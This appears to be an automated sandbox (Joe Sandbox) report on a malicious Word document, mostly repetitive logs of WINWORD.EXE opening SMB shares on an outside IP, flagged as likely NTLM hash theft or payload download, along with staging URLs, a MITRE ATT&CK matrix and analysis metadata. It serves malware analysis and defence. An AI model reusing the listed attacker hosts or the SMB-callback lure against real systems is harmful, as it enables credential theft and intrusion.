Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Stealing of Sensitive Information

Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\PIPE\srvsvc	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\SHARE1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\PIPE\wkssvc	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\PIPE\srvsvc	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\ex001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htm	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htm	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior

Opens network shares

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\SHARE1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\ex001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\file001.url	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htm	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.htm	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.zip	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\1\84.17.52.5_bc8d1_file001.search-ms	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\MSHTML_C7\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \\104.234.239.26\share1\	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Exploitation for Client Execution	Path Interception	Path Interception	1 Masquerading	OS Credential Dumping	2 Network Share Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Application Layer Protocol	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Name	Malicious	Reputation
http://74.50.94.156/MSHTML_C7/start.xml	false	unknown
http://74.50.94.156/MSHTML_C7/RFile.asp	false	unknown
http://74.50.94.156/MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_	false	unknown
http://74.50.94.156/MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_	false	unknown
http://74.50.94.156/MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://74.50.94.156/MSHTML_C7/start.xmlyX	~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
74.50.94.156	unknown	United States		19318	IS-AS-1US	false

General Information

Joe Sandbox Version:	38.0.0
Analysis ID:	1266120
Start date and time:	2023-07-03 19:08:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript) GSI enabled (Java) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Detection:	MAL
Classification:	mal84.spyw.expl.evad.winDOC@1/34@0/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28837001251118444
Encrypted:	false
SSDEEP:	48:I3hRBYMH2QkYOOwtLucv8pRGgoFzghaHPVVugz0gC8Gg+VregB21gkFIFCTGgjI3:KhLrWJOUw0gsHmgIg5GgMegigUVBVGH
MD5:	77B8F3D78CD2C6C57076A76165B43D3F
